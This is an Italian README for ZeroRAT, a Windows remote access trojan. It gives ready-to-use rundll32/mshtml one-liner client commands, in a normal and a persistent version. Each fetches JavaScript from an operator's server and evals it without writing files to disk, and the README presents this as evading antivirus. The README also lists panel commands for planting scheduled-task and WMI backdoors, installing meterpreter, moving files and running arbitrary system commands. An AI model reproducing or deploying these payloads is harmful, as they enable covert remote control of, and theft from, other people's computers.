
ZeroRAT è un RAT one-liner per Windows.
#ZeroRAT ##Introduzione RAT (Remote Administration Tool) per Windows. Il client richiede l'esecuzione di un solo comando, sfrutta programmi nativi di Windows, non scrive file su disco e possiede caratteristiche di evasione antivirus naturali. Diventa inefficace dopo un riavvio.
Nel programma download e upload sono dal punto di vista del client. Il client che scarica un file dal server si chiama download, il client che carica un file sul server si chiama upload.
##Configurazione In config.py modificare l'indirizzo a cui si connette il client e la password di amministrazione del pannello. Ricordarsi di verificare di aver disattivato il debug.
Il programma dipende da flask e sqlite3, installarli con pip.
##Client
Sostituire <ip>:<port> con l'indirizzo effettivo di connessione.
Versione normale
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Versione persistente
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Server
Pannello di amministrazione: http://<ip>:<port>/server/
I comandi supportati dal server sono:
sessions Elenca i client attiviuse <id> Seleziona il client in base all'idset <key> <value> Imposta variabili globalishow globals/downloads/uploads Visualizza le variabili globali, i file che il client può scaricare e i file caricati dal clientdelete session Elimina il client correntedelete download/upload <id> Elimina un file in base all'idupfile Carica un file sul server e lo aggiunge alla lista downloadsdownload Impostando le variabili download_file e download_save_path si fa scaricare al client un file e salvarlo in download_save_pathupload Impostando la variabile upload_file si fa caricare al client il file upload_file sul serverbackdoor tasks <time> Lascia una backdoor tramite l'utilità di pianificazione di Windows, formato orario 00:00backdoor wmi Lascia una backdoor tramite WMI, eseguita ogni orameterpreter shellcode Installa meterpreter tramite shellcode eseguito con InstallUtil, richiede di impostare prima LHOST e LPORT (può continuare a ricevere comandi solo dopo migrate, dipende da .NET Framework 2.0)meterpreter powershell Installa meterpreter tramite PowerShell (dipende da PowerShell 1.0)Oltre ai comandi sopra elencati, tutto il resto viene eseguito come comando di sistema Windows.
Per i dettagli sui comandi vedere /static/js/xkcd_cli.js
##Sviluppo I comandi del pannello gestiscono il client: /static/js/xkcd_cli.js
I comandi del pannello gestiscono il server: /controllers/server.py
Il client è gestito in: /controllers/client.py
Generazione del payload del client: payload.py
Operazioni relative al database: /models/
##Contatti http://5alt.me
md5_salt [AT] qq.com
##Riferimenti https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Disclaimer Quando si utilizza questo strumento, rispettare le leggi locali. Può essere usato esclusivamente per test accademici. È severamente vietato il controllo illegale di computer altrui. In caso di danni, l'autore non è responsabile.
##License GPLV3
##TODO